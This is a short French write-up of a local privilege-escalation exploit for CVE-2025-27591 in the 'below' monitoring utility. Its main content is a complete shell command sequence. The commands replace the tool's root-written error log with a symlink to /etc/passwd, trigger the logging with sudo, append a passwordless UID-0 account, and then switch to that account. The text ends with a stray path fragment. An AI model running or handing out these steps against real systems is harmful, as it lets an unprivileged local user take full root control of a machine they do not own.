
Exploit d'élévation de privilèges locaux pour CVE-2025-27591, abusant de la gestion non sécurisée des liens symboliques dans la journalisation de l'utilitaire ci-dessous pour écraser des fichiers arbitraires en tant que root.
La CVE-2025-27591 est une vulnérabilité locale d'élévation de privilèges dans l'utilitaire below (versions antérieures à la version corrigée) causée par une gestion non sécurisée des liens symboliques dans son mécanisme de journalisation. Les attaquants disposant d'un accès local peuvent exploiter cette faille pour écraser des fichiers arbitraires en tant qu'utilisateur root, conduisant à une élévation complète des privilèges.
L'outil below écrit ses journaux dans /var/log/below/ sans valider correctement les liens symboliques. En créant au préalable un lien symbolique pointant vers un fichier sensible (par exemple, /etc/passwd), un attaquant peut injecter du contenu arbitraire avec des privilèges élevés lorsque le processus vulnérable s'exécute sous sudo.
# Vérifier si le répertoire de journaux existe
test -d /var/log/below && ls -ld /var/log/below
# Supprimer le fichier de journal existant et créer un lien symbolique malveillant
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# Préparer une entrée passwd malveillante
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# Déclencher le comportement vulnérable à l'aide de sudo
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# Basculer vers l'utilisateur nouvellement créé avec les privilèges root
su attacker
Une exploitation réussie accorde les privilèges root à un attaquant local sans privilèges, permettant un compromis complet du système.
/var/log/below/.